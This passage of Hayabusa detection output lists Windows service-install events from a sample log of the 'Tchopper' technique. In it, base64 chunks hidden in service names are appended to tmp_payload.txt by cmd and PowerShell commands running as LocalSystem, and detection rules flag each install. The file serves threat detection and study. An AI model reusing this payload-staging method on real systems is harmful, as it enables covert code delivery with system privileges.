9ubmVjdGlvbg0KDQojQHBhcmFtICRDcmVkICAgICAtPiAgVGhlIEV2ZW50IExvZw0KI0BwYXJhbSAkQ29tcHV0ZXIgLT4gIFRoZSBhdmcgZXZlbnRzIHBlciBzZWNvbmQgZm9yIHRoZSBnaXZlbiBs | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg76"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:04.364 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9ubmVjdGlvbg0KDQojQHBhcmFtICRDcmVkICAgICAtPiAgVGhlIEV2ZW50IExvZw0KI0BwYXJhbSAkQ29tcHV0ZXIgLT4gIFRoZSBhdmcgZXZlbnRzIHBlciBzZWNvbmQgZm9yIHRoZSBnaXZlbiBs | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg76"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:05.817 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: b2cNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg77"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:05.817 
+09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: b2cNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg77"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:05.817 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: b2cNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg77"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:07.256 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: lvbiBUZXN0LUhvc3RDb25uZWN0aW9uIHsgcGFyYW0oJENvbXB1dGVyKSAgICANCg0KICAgIHRyeSB7DQoNCiAgICAgICAgaWYgKChUZXN0LUNvbm5lY3Rpb24gLUNvbXB1dGVyTmFtZSAkQ29tcHV0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg78"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" 2021-11-03 17:17:07.256 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: lvbiBUZXN0LUhvc3RDb25uZWN0aW9uIHsgcGFyYW0oJENvbXB1dGVyKSAgICANCg0KICAgIHRyeSB7DQoNCiAgICAgICAgaWYgKChUZXN0LUNvbm5lY3Rpb24gLUNvbXB1dGVyTmFtZSAkQ29tcHV0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg78"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:07.256 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: lvbiBUZXN0LUhvc3RDb25uZWN0aW9uIHsgcGFyYW0oJENvbXB1dGVyKSAgICANCg0KICAgIHRyeSB7DQoNCiAgICAgICAgaWYgKChUZXN0LUNvbm5lY3Rpb24gLUNvbXB1dGVyTmFtZSAkQ29tcHV0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg78"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:08.709 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZXIgLWNvdW50IDEgLXF1aWV0KSkgew0KDQogICAgICAgICAgICByZXR1cm4gJHRydWUNCiAgICAgICAgfQ0KDQogICAgICAgIGVsc2Ugew0KDQoNCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg79"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service 
execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:08.709 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZXIgLWNvdW50IDEgLXF1aWV0KSkgew0KDQogICAgICAgICAgICByZXR1cm4gJHRydWUNCiAgICAgICAgfQ0KDQogICAgICAgIGVsc2Ugew0KDQoNCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg79"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:08.709 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZXIgLWNvdW50IDEgLXF1aWV0KSkgew0KDQogICAgICAgICAgICByZXR1cm4gJHRydWUNCiAgICAgICAgfQ0KDQogICAgICAgIGVsc2Ugew0KDQoNCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg79"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:10.219 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: JfTE9HICJVbmFibGUgdG8gY29udGFjdCAkQ29tcHV0ZXIuIFBsZWFzZSB2ZXJpZnkgaXRzIG5ldHdvcmsgY29ubmVjdGl2aXR5IGFuZCB0cnkgYWdhaW4iDQoNCiAgICAgICAgICAgICRHbG9iYWw6 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg80"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:10.219 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: JfTE9HICJVbmFibGUgdG8gY29udGFjdCAkQ29tcHV0ZXIuIFBsZWFzZSB2ZXJpZnkgaXRzIG5ldHdvcmsgY29ubmVjdGl2aXR5IGFuZCB0cnkgYWdhaW4iDQoNCiAgICAgICAgICAgICRHbG9iYWw6 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg80"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:10.219 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: JfTE9HICJVbmFibGUgdG8gY29udGFjdCAkQ29tcHV0ZXIuIFBsZWFzZSB2ZXJpZnkgaXRzIG5ldHdvcmsgY29ubmVjdGl2aXR5IGFuZCB0cnkgYWdhaW4iDQoNCiAgICAgICAgICAgICRHbG9iYWw6 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg80"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:11.712 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Q29ubmVjdGlvbklzc3VlcyA9ICRHbG9iYWw6Q29ubmVjdGlvbklzc3VlcyArIDENCg0KICAgICAgICAgICAgcmV0dXJuICRmYWxzZQ0KICAgICAgICB9ICAgICAgICANCiAgICB9DQoNCiAgICBjYX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg81"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: 
LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:11.712 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Q29ubmVjdGlvbklzc3VlcyA9ICRHbG9iYWw6Q29ubmVjdGlvbklzc3VlcyArIDENCg0KICAgICAgICAgICAgcmV0dXJuICRmYWxzZQ0KICAgICAgICB9ICAgICAgICANCiAgICB9DQoNCiAgICBjYX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg81"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:11.712 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Q29ubmVjdGlvbklzc3VlcyA9ICRHbG9iYWw6Q29ubmVjdGlvbklzc3VlcyArIDENCg0KICAgICAgICAgICAgcmV0dXJuICRmYWxzZQ0KICAgICAgICB9ICAgICAgICANCiAgICB9DQoNCiAgICBjYX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg81"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:13.157 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSBjb25lY3QgdG8gSG9zdCINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg82"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:13.157 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: RjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSBjb25lY3QgdG8gSG9zdCINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg82"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:13.157 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSBjb25lY3QgdG8gSG9zdCINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg82"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:14.610 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbn | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg83"" | select -Expand 
DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:14.610 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbn | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg83"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:14.610 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbn | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg83"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:16.058 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCg0KICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service 
""seg84"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:16.058 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: VtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCg0KICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg84"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:16.058 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCg0KICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg84"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:17.508 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gQ3JlYXRlIGEgbG9nIHJlcG9ydCBmb3IgdGhlIGVhY2ggY29tcHV0ZXIgaW4gdGhlIGNvbXB1dGVyIG | Path: c:\windows\system32\cmd.exe /c 
powershell -command ""Get-Service ""seg85"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:17.508 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gQ3JlYXRlIGEgbG9nIHJlcG9ydCBmb3IgdGhlIGVhY2ggY29tcHV0ZXIgaW4gdGhlIGNvbXB1dGVyIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg85"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:17.508 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gQ3JlYXRlIGEgbG9nIHJlcG9ydCBmb3IgdGhlIGVhY2ggY29tcHV0ZXIgaW4gdGhlIGNvbXB1dGVyIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg85"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:18.961 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: xpc3QNCg0KI0BwYXJhbSAkTG9nTmFtZSAgICAgICAgICAgIC0+ICBUaGUgRXZlbnQgTG9nDQojQHBhcmFtICRBdmdFdmVudHNQZXJTZWNvbmQgLT4gIFRoZSBhdmcgZXZlbnRzIHBlciBzZWNvbmQg | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg86"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:18.961 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: xpc3QNCg0KI0BwYXJhbSAkTG9nTmFtZSAgICAgICAgICAgIC0+ICBUaGUgRXZlbnQgTG9nDQojQHBhcmFtICRBdmdFdmVudHNQZXJTZWNvbmQgLT4gIFRoZSBhdmcgZXZlbnRzIHBlciBzZWNvbmQg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg86"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:18.961 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: xpc3QNCg0KI0BwYXJhbSAkTG9nTmFtZSAgICAgICAgICAgIC0+ICBUaGUgRXZlbnQgTG9nDQojQHBhcmFtICRBdmdFdmVudHNQZXJTZWNvbmQgLT4gIFRoZSBhdmcgZXZlbnRzIHBlciBzZWNvbmQg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg86"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:20.414 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 
Zm9yIHRoZSBnaXZlbiBsb2cNCiNAcGFyYW0gJFRvdGFsTG9nRXZlbnRzICAgICAtPiAgVGhlIHRvdGFsICMgb2YgZXZlbnRzIGZvciB0aGUgZ2l2ZW4gbG9nDQoNCiMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg87"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:20.414 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Zm9yIHRoZSBnaXZlbiBsb2cNCiNAcGFyYW0gJFRvdGFsTG9nRXZlbnRzICAgICAtPiAgVGhlIHRvdGFsICMgb2YgZXZlbnRzIGZvciB0aGUgZ2l2ZW4gbG9nDQoNCiMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg87"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:20.414 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Zm9yIHRoZSBnaXZlbiBsb2cNCiNAcGFyYW0gJFRvdGFsTG9nRXZlbnRzICAgICAtPiAgVGhlIHRvdGFsICMgb2YgZXZlbnRzIGZvciB0aGUgZ2l2ZW4gbG9nDQoNCiMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg87"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:21.867 
+09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KZnVuY3Rpb24gQ3JlYXRlLUxvZ1JlcG9ydCB7IHBh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg88"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:21.867 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KZnVuY3Rpb24gQ3JlYXRlLUxvZ1JlcG9ydCB7IHBh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg88"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 